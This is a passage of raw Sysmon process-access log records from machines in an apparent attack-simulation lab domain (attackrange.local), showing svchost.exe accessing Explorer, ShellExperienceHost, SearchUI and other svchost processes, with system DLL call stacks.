Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x800000000000000033107Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E2-6013-8E00-00000000A401}5164C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033106Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E2-6013-8E00-00000000A401}5164C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033105Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E2-6013-8E00-00000000A401}5164C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033104Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E2-6013-8E00-00000000A401}5164C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033103Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E2-6013-8E00-00000000A401}5164C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033102Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E2-6013-8E00-00000000A401}5164C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033101Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E2-6013-8E00-00000000A401}5164C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033100Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033099Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033098Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033097Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033096Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033095Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033094Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033093Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033092Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033091Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033090Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033089Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033088Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033087Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033086Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033085Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033084Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033083Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033082Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033081Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E1-6013-8B00-00000000A401}3036C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033080Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E2-6013-9000-00000000A401}5264C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033079Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E2-6013-9000-00000000A401}5264C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033078Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:55.365{FF16AF91-26B7-6013-0D00-00000000A401}1004912C:\Windows\system32\svchost.exe{FF16AF91-26E2-6013-9000-00000000A401}5264C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000362622Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:15:00.016{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362621Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 